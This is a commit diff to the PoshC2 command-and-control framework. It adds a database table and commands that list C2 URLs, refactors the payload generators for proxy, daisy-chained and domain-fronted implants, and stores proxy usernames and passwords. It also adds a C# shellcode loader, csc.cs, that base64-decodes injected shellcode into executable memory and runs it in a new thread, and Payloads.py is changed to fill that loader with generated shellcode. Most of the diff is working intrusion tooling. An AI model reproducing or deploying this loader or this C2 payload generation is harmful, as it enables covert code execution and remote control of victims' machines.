'Added List-URLs Command to DB'

2018-10-10 08:16:32 +01:00 · 2018-10-10 08:16:32 +01:00 · a3d0b0c887
parent 41917ef436
commit a3d0b0c887
7 changed files with 218 additions and 124 deletions
--- a/C2Server.py
+++ b/C2Server.py
@ -283,6 +283,7 @@ if __name__ == '__main__':
        C2[13], C2[11], "", "", C2[19], C2[20],
        C2[21], get_newimplanturl(), PayloadsDirectory)

+      new_urldetails( "default", C2[1], C2[3], "", "", "", "" )
      newPayload.CreateRaw()
      newPayload.CreateDlls()
      newPayload.CreateShellcode()
--- a/Config.py
+++ b/Config.py
@ -4,8 +4,8 @@ HOST_NAME = '0.0.0.0'
 PORT_NUMBER = 443

 POSHDIR = "/opt/PoshC2_Python/" 
-ROOTDIR = "/opt/PoshC2-Project/" 
-HostnameIP = "https://172.16.0.126" 
+ROOTDIR = "/opt/PoshC2_Project/" 
+HostnameIP = "https://172.19.131.109" 
 ServerPort = "443"
 DomainFrontHeader = "" # example df.azureedge.net
 DefaultSleep = "5"
@ -62,7 +62,7 @@ logo = """__________            .__.     _________  ________
  |    |  (  <_> )___ \|   Y  \ \     \____/       \ 
  |____|   \____/____  >___|  /  \______  /\_______ \  
                     \/     \/          \/         \/
-  =============== v4.1 www.PoshC2.co.uk ============="""
+  =============== v4.2 www.PoshC2.co.uk ============="""
  
 # DO NOT CHANGE #

--- a/DB.py
+++ b/DB.py
@ -42,6 +42,17 @@ def initializedb():
        RandomURI TEXT,
        Command TEXT);"""

+  create_urls = """CREATE TABLE URLs (
+        URLID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
+        RandomID TEXT,
+        URL TEXT,
+        HostHeader TEXT,        
+        ProxyURL TEXT,
+        ProxyUsername TEXT,
+        ProxyPassword TEXT,
+        CredentialExpiry TEXT
+        );"""
+
  create_creds = """CREATE TABLE Creds (
        credsID INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL UNIQUE,
        Username TEXT,
@ -88,6 +99,7 @@ def initializedb():
    c.execute(create_completedtasks)
    c.execute(create_tasks)
    c.execute(create_creds)
+    c.execute(create_urls)
    c.execute(create_c2server)
    c.execute(create_history)
    conn.commit()
@ -134,6 +146,13 @@ def get_nettasks_all():
  else:
    return None

+def new_urldetails( RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry ):
+  conn = sqlite3.connect(DB)
+  conn.text_factory = str
+  c = conn.cursor()
+  c.execute("INSERT INTO URLs (RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry) VALUES (?, ?, ?, ?, ?, ?, ?)",(RandomID, URL, HostHeader, ProxyURL, ProxyUsername, ProxyPassword, CredentialExpiry))
+  conn.commit()
+
 def drop_nettasks():
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
@ -539,6 +558,17 @@ def get_hostinfo(randomuri):
  else:
    return None 

+def get_c2urls():
+  conn = sqlite3.connect(DB)
+  conn.row_factory = sqlite3.Row
+  c = conn.cursor()
+  c.execute("SELECT * FROM URLs")
+  result = c.fetchall()
+  if result:
+    return result
+  else:
+    return None 
+
 def get_autoruns():
  conn = sqlite3.connect(DB)
  conn.row_factory = sqlite3.Row
--- a/Files/csc.cs
+++ b/Files/csc.cs
@ -0,0 +1,84 @@
+using System;
+using System.Reflection;
+using System.Diagnostics;
+using System.Configuration.Install;
+using System.Runtime.InteropServices;
+using System.Threading;
+
+class Program
+    {
+		[Flags()]
+        public enum AllocationType : uint
+        {
+            COMMIT = 0x1000,
+            RESERVE = 0x2000,
+            RESET = 0x80000,
+            LARGE_PAGES = 0x20000000,
+            PHYSICAL = 0x400000,
+            TOP_DOWN = 0x100000,
+            WRITE_WATCH = 0x200000
+        }
+
+        public enum Protection
+        {
+            PAGE_NOACCESS = 0x01,
+            PAGE_READONLY = 0x02,
+            PAGE_READWRITE = 0x04,
+            PAGE_WRITECOPY = 0x08,
+            PAGE_EXECUTE = 0x10,
+            PAGE_EXECUTE_READ = 0x20,
+            PAGE_EXECUTE_READWRITE = 0x40,
+            PAGE_EXECUTE_WRITECOPY = 0x80,
+            PAGE_GUARD = 0x100,
+            PAGE_NOCACHE = 0x200,
+            PAGE_WRITECOMBINE = 0x400
+        }
+
+        [DllImport("kernel32.dll", SetLastError=true)]
+        static extern IntPtr VirtualAlloc(IntPtr lpAddress, IntPtr dwSize, AllocationType flAllocationType, Protection flProtect);
+
+        [DllImport("Kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
+        static extern IntPtr CreateThread(
+                IntPtr lpThreadAttributes,
+                uint dwStackSize,
+                IntPtr lpStartAddress,
+                IntPtr lpParameter,
+                uint dwCreationFlags,
+                out uint lpThreadId);
+
+        [DllImport("kernel32.dll", SetLastError = true)]
+        static extern bool VirtualProtect(IntPtr lpAddress, IntPtr dwSize, Protection flNewProtect, out uint lpflOldProtect);
+		
+        static void Main(string[] args)
+        {
+            byte[] shell = null;
+
+            string safdsv64 = "#REPLACEME64#";
+            string safdsv32 = "#REPLACEME32#";
+
+            if (IntPtr.Size == 4)
+            {
+                // 32-bit
+                shell = Convert.FromBase64String(safdsv32);
+            }
+            else if (IntPtr.Size == 8)
+            {
+                // 64-bit
+                shell = Convert.FromBase64String(safdsv64);
+            }
+
+            IntPtr mem = VirtualAlloc(IntPtr.Zero, (IntPtr)(shell.Length*2), AllocationType.COMMIT, Protection.PAGE_READWRITE);
+
+            if( mem != IntPtr.Zero )
+            {
+                uint oldProt = 0;
+                uint threadId = 0;
+                Marshal.Copy(shell, 0, mem, shell.Length);
+                VirtualProtect(mem, (IntPtr)(shell.Length * 2), Protection.PAGE_EXECUTE_READWRITE, out oldProt);
+                CreateThread(IntPtr.Zero, 0, mem, IntPtr.Zero, 0, out threadId);
+                WaitHandle wh = new EventWaitHandle(false, EventResetMode.ManualReset);
+                wh.WaitOne();
+            }
+        }
+
+}
--- a/Help.py
+++ b/Help.py
@ -283,6 +283,8 @@ Server Commands:
 =====================
 tasks
 opsec
+show-urls
+list-urls
 cleartasks
 show-serverinfo 
 history
@ -305,7 +307,7 @@ posh_help = posh_help1 + posh_help2 + posh_help3 + posh_help4 + posh_help5 + pos


 # pre help commands
-PRECOMMANDS = ['add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell',
+PRECOMMANDS = ['list-urls','show-urls', 'add-autorun' ,'list-autorun','del-autorun', 'nuke-autorun','automigrate-frompowershell',
 'show-serverinfo','history','output-to-html','set-clockworksmsapikey','set-clockworksmsnumber','set-defaultbeacon',
 'listmodules','pwnself','creds','createnewpayload','createproxypayload','listmodules',
 'createdaisypayload','turnoff-notifications','turnon-notifications','tasks','cleartasks',"opsec"]
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
@ -17,6 +17,80 @@ from Core import *
 def catch_exit(signum, frame):
  sys.exit(0)

+def createproxypayload():
+  proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
+  proxypass = raw_input("Proxy Password: e.g. Password1 ")
+  proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
+  credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")  
+  update_item("ProxyURL", "C2Server", proxyurl)
+  update_item("ProxyUser", "C2Server", proxyuser)
+  update_item("ProxyPass", "C2Server", proxypass)
+  C2 = get_c2server_all()
+  newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], 
+    C2[13], C2[11], "", "", C2[19], C2[20],
+    C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
+  newPayload.CreateRaw("Proxy")
+  newPayload.CreateDlls("Proxy")
+  newPayload.CreateShellcode("Proxy")
+  newPayload.CreateEXE("Proxy")
+  newPayload.CreateMsbuild("Proxy")
+  new_urldetails( "Proxy", C2[1], C2[3], proxyurl, proxyuser, proxypass, credsexpire )
+  startup("Created new proxy payloads")
+
+def createdaisypayload():
+  name = raw_input("Daisy name: e.g. DC1 ")
+  domain = raw_input("Domain or URL: https://www.example.com ")
+  daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ")
+  daisyport = raw_input("Daisy port: .e.g. 8888 ")
+  daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ")
+  daisyhost = get_implantbyid(daisyhostid)
+  proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
+  C2 = get_c2server_all()
+  newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", 
+    "", proxynone, C2[19], C2[20],
+    C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
+  newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
+  newPayload.CreateRaw(name)
+  newPayload.CreateDlls(name)
+  newPayload.CreateShellcode(name) 
+  newPayload.CreateEXE(name) 
+  newPayload.CreateMsbuild(name)
+  new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
+  startup("Created new %s daisy payloads" % name)
+
+def createnewpayload():
+  domain = raw_input("Domain or URL: https://www.example.com ")
+  domainbase = (domain.lower()).replace('https://','')
+  domainbase = domainbase.replace('http://','')
+  domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
+  proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
+  randomid = randomuri(5)
+  proxyuser = ""
+  proxypass = ""
+  credsexpire = ""
+  if proxyurl:
+    proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
+    proxypass = raw_input("Proxy Password: e.g. Password1 ")
+    credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
+    imurl = "%s?p" % get_newimplanturl()
+    domainbase = "Proxy%s%s" % (domainbase,randomid)
+  else:
+    domainbase = "%s%s" % (randomid,domainbase)
+    imurl = get_newimplanturl()
+  C2 = get_c2server_all()
+  newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, 
+    proxypass, proxyurl, "", "", C2[19], C2[20],
+    C2[21], imurl, PayloadsDirectory)
+  newPayload.CreateRaw("%s_" % domainbase)
+  newPayload.CreateDlls("%s_" % domainbase)
+  newPayload.CreateShellcode("%s_" % domainbase)
+  newPayload.CreateEXE("%s_" % domainbase)
+  newPayload.CreateMsbuild("%s_" % domainbase)
+  newPayload.CreatePython("%s_" % domainbase)
+  new_urldetails( randomid, domain, domainfront, proxyurl, proxyuser, proxypass, credsexpire )
+  startup("Created new payloads")
+
+
 def argp(cmd):
  args = ""
  try: 
@ -163,7 +237,12 @@ def startup(printhelp = ""):
      graphviz()
      time.sleep(1)
      startup()
-
+    if ("show-urls" in implant_id.lower()) or ("list-urls" in implant_id.lower()):
+      urls = get_c2urls()
+      urlformatted = "RandomID  URL  HostHeader  ProxyURL  ProxyUsername  ProxyPassword  CredentialExpiry\n"
+      for i in urls:
+        urlformatted += "%s  %s  %s  %s  %s  %s  %s  %s \n" % (i[0],i[1],i[2],i[3],i[4],i[5],i[6],i[7])
+      startup(urlformatted)
    if "add-autorun" in implant_id.lower():
      autorun = (implant_id.lower()).replace("add-autorun ","")
      autorun = autorun.replace("add-autorun","")
@ -266,69 +345,13 @@ def startup(printhelp = ""):
        sys.exit(0)
    
    if "createdaisypayload" in implant_id.lower():
-      name = raw_input("Daisy name: e.g. DC1 ")
-      daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ")
-      daisyport = raw_input("Daisy port: .e.g. 8888 ")
-      daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ")
-      daisyhost = get_implantbyid(daisyhostid)
-      proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
-
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", 
-        "", proxynone, C2[19], C2[20],
-        C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
-      newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
-      newPayload.CreateRaw(name)
-      newPayload.CreateDlls(name)
-      newPayload.CreateShellcode(name) 
-      newPayload.CreateEXE(name) 
-      newPayload.CreateMsbuild(name)
-      startup("Created new %s daisy payloads" % name)
+      createdaisypayload()

    if "createproxypayload" in implant_id.lower():
-      proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
-      proxypass = raw_input("Proxy Password: e.g. Password1 ")
-      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
-      update_item("ProxyURL", "C2Server", proxyurl)
-      update_item("ProxyUser", "C2Server", proxyuser)
-      update_item("ProxyPass", "C2Server", proxypass)
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], 
-        C2[13], C2[11], "", "", C2[19], C2[20],
-        C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
-
-      newPayload.CreateRaw("Proxy")
-      newPayload.CreateDlls("Proxy")
-      newPayload.CreateShellcode("Proxy")
-      newPayload.CreateEXE("Proxy")
-      newPayload.CreateMsbuild("Proxy")
-      startup("Created new proxy payloads")
+      createproxypayload()

    if "createnewpayload" in implant_id.lower():
-      domain = raw_input("Domain or URL: https://www.example.com ")
-      domainbase = (domain.lower()).replace('https://','')
-      domainbase = domainbase.replace('http://','')
-      domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
-      proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
-      proxypass = raw_input("Proxy Password: e.g. Password1 ")
-      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
-      if proxyurl:
-        imurl = "%s?p" % get_newimplanturl()
-        domainbase = "Proxy%s" % domainbase
-      else:
-        imurl = get_newimplanturl()
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, 
-        proxypass, proxyurl, "", "", C2[19], C2[20],
-        C2[21], imurl, PayloadsDirectory)
-
-      newPayload.CreateRaw("%s_" % domainbase)
-      newPayload.CreateDlls("%s_" % domainbase)
-      newPayload.CreateShellcode("%s_" % domainbase)
-      newPayload.CreateEXE("%s_" % domainbase)
-      newPayload.CreateMsbuild("%s_" % domainbase)
-      newPayload.CreatePython("%s_" % domainbase)
-      startup("Created new payloads")
+      createnewpayload()

    if (implant_id == "?") or (implant_id == "help"):
      startup(pre_help)
@ -864,69 +887,14 @@ def runcommand(command, randomuri):
      new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, randomuri)

    elif "createdaisypayload" in command.lower():
-      name = raw_input("Daisy name: e.g. DC1 ")
-      daisyurl = raw_input("Daisy host: .e.g. http://10.150.10.1 ")
-      daisyport = raw_input("Daisy port: .e.g. 8888 ")
-      daisyhostid = raw_input("Select Daisy Implant Host: e.g. 5 ")
-      daisyhost = get_implantbyid(daisyhostid)
-      proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
-
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "", 
-        "", proxynone, C2[19], C2[20],
-        C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
-      newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
-      newPayload.CreateRaw(name)
-      newPayload.CreateDlls(name)
-      newPayload.CreateShellcode(name)    
-      newPayload.CreateEXE(name)   
-      newPayload.CreateMsbuild(name)
-      startup("Created new %s daisy payloads" % name)
+      createdaisypayload()

    elif "createproxypayload" in command.lower():
-      proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
-      proxypass = raw_input("Proxy Password: e.g. Password1 ")
-      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
-      update_item("ProxyURL", "C2Server", proxyurl)
-      update_item("ProxyUser", "C2Server", proxyuser)
-      update_item("ProxyPass", "C2Server", proxypass)
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12], 
-        C2[13], C2[11], "", "", C2[19], C2[20],
-        C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
-
-      newPayload.CreateRaw("Proxy")
-      newPayload.CreateDlls("Proxy")
-      newPayload.CreateShellcode("Proxy")
-      newPayload.CreateEXE("Proxy")
-      newPayload.CreateMsbuild("Proxy")
-      startup("Created new proxy payloads")
+      createproxypayload()

    elif "createnewpayload" in command.lower():
-      domain = raw_input("Domain or URL: https://www.example.com ")
-      domainbase = (domain.lower()).replace('https://','')
-      domainbase = domainbase.replace('http://','')
-      domainfront = raw_input("Domain front URL: e.g. fjdsklfjdskl.cloudfront.net ")
-      proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
-      proxypass = raw_input("Proxy Password: e.g. Password1 ")
-      proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
-      if proxyurl:
-        imurl = "%s?p" % get_newimplanturl()
-        domainbase = "Proxy%s" % domainbase
-      else:
-        imurl = get_newimplanturl()
-      C2 = get_c2server_all()
-      newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser, 
-        proxypass, proxyurl, "", "", C2[19], C2[20],
-        C2[21], imurl, PayloadsDirectory)
+      createproxypayload()

-      newPayload.CreateRaw("%s_" % domainbase)
-      newPayload.CreateDlls("%s_" % domainbase)
-      newPayload.CreateShellcode("%s_" % domainbase)
-      newPayload.CreateEXE("%s_" % domainbase)
-      newPayload.CreateMsbuild("%s_" % domainbase)
-      newPayload.CreatePython("%s_" % domainbase)
-      startup("Created new payloads")
    else:
      if command:
        new_task(command, randomuri)
--- a/Payloads.py
+++ b/Payloads.py
@ -27,13 +27,11 @@ class Payloads(object):
    self.ConnectURL = ConnectURL
    self.BaseDirectory = BaseDirectory
    if os.path.exists("%saes.py" % PayloadsDirectory):
-      print "FOUND AES"
      with open("%saes.py" % PayloadsDirectory, 'rb') as f:
        content = f.read()
        import re
        m = re.search('#KEY(.+?)#KEY', content);
        if m: keyfound = m.group(1)
-        print keyfound
        self.PythonHash = hashlib.sha512(content).hexdigest()
        self.PythonKey = keyfound
    else: 
@ -498,6 +496,17 @@ End Sub
      x86base64 = base64.b64encode(b86.read())
    with open(x64filename, "rb") as b64:
      x64base64 = base64.b64encode(b64.read())  
+    with open("%scsc.cs" % FilesDirectory, 'rb') as f:
+      content = f.read()
+    ccode = content.replace("#REPLACEME32#",x86base64)
+    ccode = ccode.replace("#REPLACEME64#",x64base64)
+    filename = "%scsc.cs" % (self.BaseDirectory)
+    output_file = open(filename, 'w')
+    output_file.write(ccode)
+    output_file.close()
+    self.QuickstartLog( "" )
+    self.QuickstartLog( "CSC file written to: %s%scsc.cs" % (self.BaseDirectory,name) )
+
    projname = randomuri()

    msbuild="""<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">